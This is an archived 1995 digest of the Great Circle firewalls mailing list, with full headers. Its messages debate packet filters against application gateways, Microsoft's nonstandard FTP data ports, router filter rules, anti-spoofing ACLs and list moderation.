firewalls-owner@GreatCircle.COM Precedence: bulk >Firewall-1 is a packet filter. A smart filter, but never-the-less a filter. >Application gateways are more secure. This statement is perhaps too strong. Jim From firewalls-owner Thu Oct 12 15:16:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA18293 for firewalls-outgoing; Thu, 12 Oct 1995 14:45:19 -0700 Received: from nda.nda.com (fw1.nda.COM [204.57.47.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA18286 for ; Thu, 12 Oct 1995 14:45:15 -0700 Received: (kovar@localhost) by nda.nda.com (8.6.11/8.6.4) id RAA10944; Thu, 12 Oct 1995 17:43:21 -0400 From: David Kovar Message-Id: <199510122143.RAA10944@nda.nda.com> Subject: Re: Firewall1 Comparison To: avolio@TIS.COM (Frederick M Avolio) Date: Thu, 12 Oct 1995 17:43:20 -0400 (EDT) Cc: wherrman@strong-funds.com, firewalls@GreatCircle.COM In-Reply-To: <9510121925.AA01780@tis.com> from "Frederick M Avolio" at Oct 12, 95 03:25:48 pm X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 554 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Firewall-1 is a packet filter. A smart filter, but never-the-less a filter. > Application gateways are more secure. This is partly a religious issue. Depending on the nature of your network, and needs, and services, and human resources, and finances, one option may be more secure than another. You need to do a detailed evaluation of your environment and match that to the available offerings, based on as much knowledge about those offerings as you can get. Simply stating that "Application gateways are more secure." is a falsehood. -David From firewalls-owner Thu Oct 12 16:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA19120 for firewalls-outgoing; Thu, 12 Oct 1995 15:48:38 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA19113 for ; Thu, 12 Oct 1995 15:48:32 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id IAA02890; Fri, 13 Oct 1995 08:41:44 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma002883; Fri Oct 13 08:41:15 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA24425; Fri, 13 Oct 1995 08:47:19 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9510122247.AA24425@citecub.citec.qld.gov.au> Subject: Re: Microsoft FTP wierd To: blast@crl.com (Tim Keanini) Date: Fri, 13 Oct 95 8:47:18 EST Cc: firewalls@greatcircle.com In-Reply-To: ; from "Tim Keanini" at Oct 12, 95 12:26 pm X-Mailer: ELM [version 2.3 PL11] content-length: 1132 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, All this talk of the Microsoft ftpd using ports other than 20 for the reverse connection has got me to start thinking (finally:-). The firewalls I have set up so far use an external router with filters that control inbound connections as follows: # mail feed allow tcp from *.*.*.* gt 1023 to bastion eq smtp # news feed allow tcp from newshost gt 1023 to bastion eq nntp # ftp data channel allow tcp from *.*.*.* eq 20 to bastion gt 1023 # return packets from any connection the bastion made allow tcp from *.*.*.* to bastion gt 1023 established Everything else is blocked. As it is now, the bastion cannot receive ftp data from anyone not using port 20. (This probably explains my inability to ftp anything from iwi.com, hey mjr). Am I being over-paranoid wrt the ftp data? Should I just replace the ftp rule with: # ftp data channels allow tcp from *.*.*.* eq 20 to bastion gt 1023 allow tcp from *.*.*.* gt 1023 to bastion gt 1023 [this of course obviates the need for the last rule (established)] and rely on netacl to control access to the other services I have listening on ports > 1023? Colin From firewalls-owner Thu Oct 12 18:00:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA20881 for firewalls-outgoing; Thu, 12 Oct 1995 17:49:45 -0700 Received: from switchblade.iwi.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA20874 for ; Thu, 12 Oct 1995 17:49:42 -0700 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id UAA25496 for firewalls@greatcircle.com; Thu, 12 Oct 1995 20:48:15 -0400 From: "Marcus J. Ranum" Message-Id: <199510130048.UAA25496@switchblade.iwi.com> Subject: Re: NT FTP weirdness To: firewalls@greatcircle.com Date: Thu, 12 Oct 1995 20:48:15 -0400 (EDT) Reply-To: mjr@iwi.com Organization: Information Warehouse! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 2256 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ken Hardy writes: >>FTP.microsoft.com initiates all data port connections from random, >... >>Since ftp.microsoft.com's FTP-data connections weren't coming from port >>20, they weren't allowed in. > >Fine, let M$ redefine the standards, as is their wont, until nobody can >connect to them. Maybe if we all ignore them, they'll just go away. You'll notice that the FTP server on switchblade.iwi.com does not bind port 20, either. That's for a reason. The FTP protocol has a number of major security flaws in it (No - don't ask. If you're someone I'd tell, I've already told you. If I haven't already told you, you're not someone I'd tell.) that I discovered years ago. Most versions of UNIX out there have had the necessary fixes quietly added long enough ago that it's not a big problem, but who knows about everything else? The best way to fix some of the FTP protocol flaws and, by extension, the broken packet filters that trust or permit client-bound ports, is to break them so that they no longer work, and force people who want to use them to stop relying on broken features of broken protocols. FTP is overly long in the tooth and we should put it to bed *NOW*. I, unfortunately, do not have a service that is interesting or important enough to provide leverage, but what we need is someone with something everyone wants to provide it using a secure (and reasonably designed) file transfer protocol, and to only support that and no FTP. Backwards compatibility is one of the greatest foes of security. "It's broke and we can't fix it!" is what it amounts to. Hobbit writes: >I never quite understood why the spec wanted the back-connections to come from >port 20 in the first place, or for that matter why the *server* was supposed >to initiate back to the *client* at all. Case in point. The back connections on a bound client port is a relic of the days before IP had been invented. Sockets were uni-directional and if you wanted bi-directional data flow you had to use 2 sockets. Each server had to bind its own port and be (in effect) a mini inetd. Rather than scrap it and redesign it, we keep slapping patches and kluges onto a dead horse. Not only is it dead - as rob says - "it's starting to smell bad." mjr. From firewalls-owner Thu Oct 12 18:31:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA21291 for firewalls-outgoing; Thu, 12 Oct 1995 18:26:56 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA21284 for ; Thu, 12 Oct 1995 18:26:52 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA18104; Thu, 12 Oct 95 21:20:04 -0400 Date: Thu, 12 Oct 95 21:20:04 -0400 Message-Id: <9510130120.AA18104@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Various FTPs Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I agree with Marcus concerning the probloms in FTP & possibly IPV6 will repair/replace it. For now I suspect that the answer is a Firewall that will only allow an Inward port 20 connection if the inside node already had a port 21 outward connection (No, I do not mean via "established" I mean the firewall should beep track of what connections exist). This will work with current systems without retrofit. Now on reclection I suspect macrosloth is different from the IWI site (Marcus' code) since the lockup occurs on connection before I even have a chance to issue PASV - that worked to IWI. Warmly, Padgett From firewalls-owner Thu Oct 12 19:00:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA21608 for firewalls-outgoing; Thu, 12 Oct 1995 18:55:24 -0700 Received: from ford.gbnet.org (ford.gbnet.org [192.188.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA21601 for ; Thu, 12 Oct 1995 18:55:20 -0700 Received: (from steve@localhost) by ford.gbnet.org (8.7.Beta.10/8.6.12) id CAA23932 for firewalls@greatcircle.com; Fri, 13 Oct 1995 02:53:34 +0100 (BST) From: Steve Kennedy Message-Id: <199510130153.CAA23932@ford.gbnet.org> Subject: New Scientist letter To: firewalls@greatcircle.com Date: Fri, 13 Oct 1995 02:53:34 +0100 (BST) X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk New Scientist is a UK publication that covers science topics in general, here is a letter they published (I'm re-typing without permission). > "Oh yeah?" > > In your article on computer hackers ("Catching Kevin and his Friends" 2 > Sept), Joe Flowers quotes William Cheswick of AT&T and his co-author > Steve Bellovin as claiming to have "never had an undetected illegal > entry through our firewall". Well, they have. > > Steve Elliott, Balmain, Australia Regards Steve -- home steve@gbnet.org * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU work steve@demon.net * tel +44-(0)171 483 1169 FAX +44-(0)181 444 6103 www http://www.gbnet.net/ * GSM mobile +44-(0)802 444 500 bits steve@gbnet.net * GSM data @2400 0802-449500 @9600 449501 fax 449502 Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk) From firewalls-owner Thu Oct 12 22:13:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA24390 for firewalls-outgoing; Thu, 12 Oct 1995 22:10:54 -0700 Received: from interlock.mgh.com (interlock.mgh.com [152.159.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA24383 for ; Thu, 12 Oct 1995 22:10:50 -0700 From: dnewman@mcgraw-hill.com Received: by interlock.mgh.com id AA05031 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Fri, 13 Oct 1995 01:08:47 -0400 Message-Id: <199510130508.AA05031@interlock.mgh.com> Received: by interlock.mgh.com (Protected-side Proxy Mail Agent-1); Fri, 13 Oct 1995 01:08:47 -0400 Date: Thu, 12 Oct 95 22:36:48 EDT To: vjm@relevantum.fi, firewalls@greatcircle.com Subject: RE: route and Win95 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There is one scenario in which Windows 95 will send advertisements--but only for Novell Netware's IPX SAP. As with IP routing, the default setting is to disable SAP broadcasts. If Netware file and print sharing is enabled, however, it's possible to turn on SAP advertisements. Then the 95 machine appears as a Netware server, and Netware clients that attach to it won't be able to reach real Netware servers until the Win95 machine is shut down. Microsoft says its forthcoming NDS client will address this. dn From firewalls-owner Thu Oct 12 23:43:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA25471 for firewalls-outgoing; Thu, 12 Oct 1995 23:41:10 -0700 Received: from yarrina.connect.com.au (yarrina.connect.com.au [192.189.54.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA25464 for ; Thu, 12 Oct 1995 23:41:04 -0700 Received: (from root@localhost) by yarrina.connect.com.au with UUCP id QAA24087 (8.6.12/IDA-1.6); Fri, 13 Oct 1995 16:36:41 +1000 Received: by junkers.lochard.com.au id AA43274 (5.65c/IDA-1.5); Fri, 13 Oct 1995 14:49:02 +1100 From: Mark Message-Id: <199510130349.AA43274@junkers.lochard.com.au> Subject: Re: New Scientist letter To: steve@gbnet.org (Steve Kennedy) Date: Fri, 13 Oct 1995 14:49:02 +1000 (E ) Cc: firewalls@GreatCircle.COM In-Reply-To: <199510130153.CAA23932@ford.gbnet.org> from "Steve Kennedy" at Oct 13, 95 02:53:34 am Content-Type: text Content-Length: 920 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> "Oh yeah?" >> >> In your article on computer hackers ("Catching Kevin and his Friends" 2 >> Sept), Joe Flowers quotes William Cheswick of AT&T and his co-author >> Steve Bellovin as claiming to have "never had an undetected illegal >> entry through our firewall". Well, they have. >> >> Steve Elliott, Balmain, Australia Whilst I dont want to give Australia a bad rep on this topic I also know of other penetrations into the att.com domain. It was through reasearch.att.com as well, not bypassing it. Wether this entry continues I am not certain about. How is this related to Kevin? He was a phreaker, not a cracker (of the above skill). Admittedly his antics were cheeky when you look at the whole picture. His skills in social engineering were the key to his success. A number of people still dont realise they were "done" by him. Cheers, Mark mark@lochard.com.au The above opinions are rumoured to be my own. From firewalls-owner Fri Oct 13 00:43:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA25984 for firewalls-outgoing; Fri, 13 Oct 1995 00:29:44 -0700 Received: from mickey.iafrica.com (mickey.iafrica.com [192.96.87.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA25977 for ; Fri, 13 Oct 1995 00:29:34 -0700 Received: from jumper by mickey.iafrica.com with smtp (Smail3.1.29.1 #22) id m0t3eWi-000C3KC; Fri, 13 Oct 95 09:27 GMT+0200 Message-Id: Comments: Authenticated sender is From: "Mark Maunder" To: firewalls@greatcircle.com Date: Fri, 13 Oct 1995 09:27:09 +0000 Subject: Newbie looking for advice... Reply-to: markdm@iafrica.com Priority: normal X-mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm new on the TCP/IP network scene and am involved in the programming of a large web site and have been roped in to arrange some security for our site. We have an ethernet network with two NetWare boxes and an AS400 and a wide area link to a few other branches. The network runs TCP/IP as well as IPX. We are putting in a leased line and will have the line going via a router into our little ethernet network on which our WWW server will be sitting. Perhaps someone can tell me if this is total fantasy, but would it be a good start (and possible) to configure the router to only allow connects from the outside to certain hosts on the inside - and to only allow through HTTP packets? Also could we configure it to make sure that no one on the outside has an IP address that is supposed to be on the inside? ( IP Spoofing) Does this sound like a good start for a low cost firewall - or am I totally off the track here? Is configuring a router a reasonable security measure? Perhaps someone can point me in the right direction. My apologies for the waste of mailbox space. Mark Maunder (markdm@iafrica.com) Novell support engineer. From firewalls-owner Fri Oct 13 01:43:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA27276 for firewalls-outgoing; Fri, 13 Oct 1995 01:41:03 -0700 Received: from world-net.sct.fr (world-net.sct.fr [194.2.128.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA27269 for ; Fri, 13 Oct 1995 01:40:55 -0700 From: savron@world-net.sct.fr Received: from 194.2.128.1.sct.fr. (client41.sct.fr [194.2.128.71]) by world-net.sct.fr (8.6.12/8.6.10) with SMTP id JAA17359 for ; Fri, 13 Oct 1995 09:36:09 +0100 Date: Fri, 13 Oct 1995 09:36:09 +0100 Message-Id: <199510130836.JAA17359@world-net.sct.fr> X-Sender: savron@world-net.sct.fr (Unverified) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com Subject: firewalls for WIN95 X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk is there any firewalling solution for a WIN95 pc ? Thanks From firewalls-owner Fri Oct 13 03:43:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA29645 for firewalls-outgoing; Fri, 13 Oct 1995 03:34:48 -0700 Received: from gmap-gw.leeds.ac.uk (gmap15.leeds.ac.uk [129.11.84.200]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA29636 for ; Fri, 13 Oct 1995 03:34:38 -0700 Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id LAA17906 for ; Fri, 13 Oct 1995 11:08:38 +0100 Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id LAA12385 for ; Fri, 13 Oct 1995 11:32:27 +0100 From: Danny Cox Date: Fri, 13 Oct 1995 11:28:42 +0100 Message-Id: <6373.9510131028@gmap.leeds.ac.uk> X-Planation: X-Faces images can be viewed with the XFaces program To: firewalls@greatcircle.com Subject: Modems and IPX tunnelling X-Sun-Charset: US-ASCII X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt; Fri, 13 Oct 1995 04:34:56 -0700 Received: (pferguso@localhost) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id EAA20326; Fri, 13 Oct 1995 04:32:28 -0700 From: Paul Ferguson Message-Id: <199510131132.EAA20326@lint.cisco.com> Subject: Re: Newbie looking for advice... To: markdm@mickey.iafrica.com (Mark Maunder) Date: Fri, 13 Oct 95 4:32:28 PDT Cc: firewalls@GreatCircle.COM In-Reply-To: ; from "Mark Maunder" at Oct 13, 95 9:27 am X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Perhaps someone can tell me if this is total fantasy, but would it be > a good start (and possible) to configure the router to only allow > connects from the outside to certain hosts on the inside - and to > only allow through HTTP packets? Also could we configure it to make > sure that no one on the outside has an IP address that is supposed to > be on the inside? ( IP Spoofing) > The 'fix' to block spoofing is a simple one. If you are using access control mechanisms, simply place an access control list on the inbound interface explicitly denying entrance to any packet which claims to be from the internal network (address). Voila. As to any methodologies which allow access to particular internal devices, there are certain risks in this approach. By allowing explicit transient access directly to an internal device, you expose them to greater risk of compromise. - paul -- Paul Ferguson || || cisco Systems || || Consulting Engineering |||| |||| pferguso@cisco.com ..:||||||:..:||||||:.. c i s c o S y s t e m s From firewalls-owner Fri Oct 13 05:43:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA01778 for firewalls-outgoing; Fri, 13 Oct 1995 05:36:42 -0700 Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA01771 for ; Fri, 13 Oct 1995 05:36:37 -0700 Received: (pferguso@localhost) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id FAA28028; Fri, 13 Oct 1995 05:34:35 -0700 From: Paul Ferguson Message-Id: <199510131234.FAA28028@lint.cisco.com> Subject: Re: First and last subnet ??? To: yg@muturl.planet-int.net (Yannick Gravel) Date: Fri, 13 Oct 95 5:34:35 PDT Cc: firewalls@GreatCircle.COM In-Reply-To: ; from "Yannick Gravel" at Oct 11, 95 10:46 pm X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It depends. If you are using a classless routing protocol, you can certainly use these subnets. If you are using a classful routing protocol, then it depends on the vendor platform and if they have a mechanisn that supports explicit use of these subnets. A word of caution is needed, however, since using them is not RFC compliant. :-) - paul > > Hi Net&Sys Security poeples, > > Something that everybody is talking about, but not everybody > is saying the same thing about subnetting: > > Yes, everybody agree that we lose the first and last host of > each subnet for net.iding and broadcasting. > > But, some are saying that I can use all subnet; but others are > saying that we lose the first and last subnet... > > Whom truth is true.. > > Thanks.. > > Yannick Gravel > System administrator -- yannick.gravel@planet-int.net > -- Paul Ferguson || || cisco Systems || || Consulting Engineering |||| |||| pferguso@cisco.com ..:||||||:..:||||||:.. c i s c o S y s t e m s From firewalls-owner Fri Oct 13 06:14:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA02419 for firewalls-outgoing; Fri, 13 Oct 1995 06:11:00 -0700 Received: from politics.ma02.bull.com (politics.ma02.bull.com [128.35.35.61]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA02412 for ; Fri, 13 Oct 1995 06:10:57 -0700 Message-Id: <199510131310.GAA02412@miles.greatcircle.com> Received: by politics.ma02.bull.com (15.11/15.6) id AA24637; Fri, 13 Oct 95 09:04:40 edt From: John Young Subject: Re: NT FTP weirdness To: firewalls@greatcircle.com Date: Fri, 13 Oct 95 9:04:38 EDT In-Reply-To: ; from "Robert Dana" at Oct 12, 95 9:41 am Mailer: Elm [revision: 64.9] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From what I have seen in my traffic logs, the port selection from ftp.microsoft.com is not random. It appears that it is always selecting tcp port 5375 for the source of the data connection. This may or may not be relevant to my next question: Does anyone know how Firewall-1 handles this wrt its stateful packet filtering? Is Firewall-1 able to determine that this is a data connection that is related to an existing control connection or will the transfer simply fail without a global "allow all tcp from 5375 to any > 1023? If this is the case, what would Firewall-1 really provide in the way of increased security over a Cisco with ACL's? I would be very interested in any insight as we are seriously considering Firewall-1 as an upgrade to our firewall architecture. > FTP.microsoft.com initiates all data port connections from random, > high-numbered TCP ports, instead of the RFC-mandated port 20. This > apparently > was intentional- there's a registry setting called "EnablePortAttack" that, > when turned on, will cause the server to initiate connections from 20 > again. TIA, John B. Young Network Engineer International Bull Telecommunications j.o.young@bull.com From firewalls-owner Fri Oct 13 06:30:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA02482 for firewalls-outgoing; Fri, 13 Oct 1995 06:18:02 -0700 Received: from TIS.COM (neptune.tis.com [192.94.214.96]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA02475 for ; Fri, 13 Oct 1995 06:17:59 -0700 Received: from relay.tis.com by neptune.TIS.COM id aa13251; 13 Oct 95 9:13 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma004626; Fri, 13 Oct 95 08:55:54 -0400 Received: from gildor (gildor.tis.com) by tis.com (4.1/SUN-5.64) id AA03024; Fri, 13 Oct 95 09:12:51 EDT Message-Id: <9510131312.AA03024@tis.com> X-Sender: avolio@sol.tis.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 13 Oct 1995 09:12:54 -0400 To: firewalls@greatcircle.com From: Frederick M Avolio Subject: Re: Firewall1 Comparison Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>Application gateways are more secure. > >This statement is perhaps too strong. Indeed, I am being dogmatic, in my loveable way. :-) It is not a religious question, as someone suggested, but it *is* a philosophical one. See papers on our web server and on our competitors' web servers for philisophical discussions (well, as well as marketing stuff, etc. :-)). Fred From firewalls-owner Fri Oct 13 06:44:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA02603 for firewalls-outgoing; Fri, 13 Oct 1995 06:25:04 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA02596 for ; Fri, 13 Oct 1995 06:25:01 -0700 From: dgooding@accel.com Received: from smtpgwy.accel.com by relay3.UU.NET with SMTP id QQzlgv25043; Fri, 13 Oct 1995 09:23:10 -0400 Received: from ccMail by smtpgwy.accel.com id AA813601172 Fri, 13 Oct 95 09:19:32 EST Date: Fri, 13 Oct 95 09:19:32 EST Message-Id: <9509138136.AA813601172@smtpgwy.accel.com> To: firewalls@greatcircle.com Subject: Who would you invest in? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [Uh-oh, here comes a venture capitalist, there goes the neighborhood] If you could invest in a firewall company (not your own), who would it be? Related to that, after reading the mail list archives and the FAQ, I'm beginning to believe the firewall market will be two-tiered: high end, Fortune 1000 enterprise firewalls and "low end," unfortunate 100,000 firewalls. The enterprise variety will compete based on "the best" security, scalability, manageability, performance, and compatibility with overall enterprise network security. The small business firewall market will have "good enough" security, attractive pricing, and features appropriate for two- or three-tier distribution. Do you agree? And if so, who are the leaders in the enterprise firewall market, and in the small- to medium-size business firewall market? Or, as someone has suggested, will the current leaders be swallowed into ISP functionality (for the enterprise? for the mass market?)? Don Gooding Research Partner Accel Partners dgooding@accel.com http://www.accel.com From firewalls-owner Fri Oct 13 08:01:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04164 for firewalls-outgoing; Fri, 13 Oct 1995 07:43:19 -0700 Received: from psyche.the-wire.com (psyche.the-wire.com [198.53.192.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA04146 for ; Fri, 13 Oct 1995 07:43:11 -0700 Received: from anton.the-wire.com (anton.the-wire.com [198.53.192.186]) by psyche.the-wire.com (8.6.10/8.6.9) with SMTP id KAA07603; Fri, 13 Oct 1995 10:40:43 -0400 Date: Fri, 13 Oct 1995 10:40:43 -0400 Message-Id: <199510131440.KAA07603@psyche.the-wire.com> X-Sender: anton@the-wire.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Michael Haberler From: Anton J Aylward Subject: Re: WE THE PEOPLE "....want the facts to make informed intel Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 04:39 11/10/95 -0100, Michael Haberler wrote: >What about mailing list/news software which only would accept PGP-signed >messages where the keys must have a certificate path lenth of at least 2 in >the mailinglist web of trust (i.e. a contributor must be endorsed by at >least two other)? ..... > >Michael Haberler mah@eunet.co.at >EUnet Austria Ltd MH182 >A-1090 Vienna, Austria, Thurngasse 8/16 >Tel: +43 (1) 31376 fax: +43 (1) 3106926 I know this gets away from the charter of the groups, but I believe we have to defend that same charter. One of the reasons I use lists rather than USENET is the s/n ratio. To date, I find that this list has a pretty good ratio. I believe this is because it is a critical technology subject and the subscribers and the people who submit are professionals to whom this list relates to their livelyhood. Once it becomes a USENET group we open it up to all commers, more specifically, those who have no professional interest in the technical quality of the postings. I guess spamming is a prime example of no technical quality. I like the web of trust idea, but there are simpler ways. The most obvious one is to only accept postings from subscribers. Correct me if I'm wrong, but I recall reading that some lists do actually practice this. Of course once the list is cross-linked with a newsgroup that all goes out the window. To be honest, I've never believed in the "meek shall inherit..." and "ignore them and they'll go away" attitudes towards bullies and loudmouths and spammers. On top of this all, I am outraged as a Canadian Citizen that soemone should try and force this on me AND justify it by an interpretation of HIS constitution which is, at best, flakey. This list is very strongly international in content. Part of our view of freedom - and I understand the one to be held in the USA - is that you can't force your beliefs, religious, politcal or otherwise, on those who do not wish to subscribe to them. It is sad that people who I've always believed a firewall is primarily about access control. The 'web of trust' that Michael espouses could be viewed this way. Lists are not meant to be "Democratic" - whatever that means. A list "manager" has every right to delete someone who abuses the aims and charter. Having a front-end filter which only alows posting by susbscribers is one way to do this. Without needing all the PGP technology. Now I've raised this in the forum of the list, I'd like to move all discussion out of the list, as I did with my original communication about this to Brent. He manages the list, it is to him that we should direct discussion about what we think he ought to do about occurences like this. Sigh! Dealing with management and preaching at them to be proactive about security seems to have a distinct affect on the way I'm dealing with things; politcal solutions before technical solutions. Either that or I'm growing old faster than I thought. /anton -- Anton J Aylward The Strahn and Strachan Group Inc Information Security Consultants Voice: (416) 494-8661 Fax: (416) 494-8803 From firewalls-owner Fri Oct 13 08:15:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04484 for firewalls-outgoing; Fri, 13 Oct 1995 07:58:55 -0700 Received: from intex.intex.net (intex.intex.net [204.255.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA04476 for ; Fri, 13 Oct 1995 07:58:51 -0700 Received: from dialupb56.intex.net (dialupb56.intex.net [204.255.103.56]) by intex.intex.net (8.6.12/4.1.4) with SMTP id JAA10825; Fri, 13 Oct 1995 09:56:55 -0500 Message-Id: <199510131456.JAA10825@intex.intex.net> X-Sender: lpierce@intex.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 13 Oct 1995 09:56:46 -0500 To: Frederick M Avolio , firewalls@GreatCircle.COM From: lpierce@intex.net (S. Lane Pierce) Subject: Re: Firewall1 Comparison Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:12 AM 10/13/95 -0400, Frederick M Avolio wrote: >>>Application gateways are more secure. >> >>This statement is perhaps too strong. > >Indeed, I am being dogmatic, in my loveable way. :-) bla bla bla yada yada.... Fellow firewallers (and vendors). An outright plug (like the one generating this thread) is best done by emailing directly to the originator not the list. Now a healthy discussion on the benefits of applications gateways vs. packet filters sounds like fun but this one started with a "my daddy can beat up your daddy" marketing strategy, not in the pursuit of knowledge. S. Lane Pierce lpierce@intex.net From firewalls-owner Fri Oct 13 08:30:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA04853 for firewalls-outgoing; Fri, 13 Oct 1995 08:18:25 -0700 Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA04846 for ; Fri, 13 Oct 1995 08:18:19 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA06334; Fri, 13 Oct 95 11:18:14 EDT Date: Fri, 13 Oct 1995 11:18:13 -0400 (EDT) From: Scott Barman To: padgett@tccslr.dnet.mmc.com Cc: firewalls@greatcircle.com Subject: Re: Various FTPs In-Reply-To: <9510130120.AA18104@uvs1.orl.mmc.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 12 Oct 1995 padgett@tccslr.dnet.mmc.com wrote: > I agree with Marcus concerning the probloms in FTP & possibly IPV6 > will repair/replace it. For now I suspect that the answer is a I have been "observing" the output of the IETF for IPv6 and have seen nothing regarding changing ftp. It seems their concerns are a larger address space and security. I don't think I'm alone in my desire to see something replace it and, as Marcus Ranum said about himself in a previous note, I'm not "big" enough to try to force a change! scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "I don't know if security explains why the Win95 support Web servers run BSDI 2.0--an Intel-based Unix--rather than Windows NT, which Microsoft insists is the ideal Web software solution. Does Redmond know something we don't know?" -Robert X. Cringely, 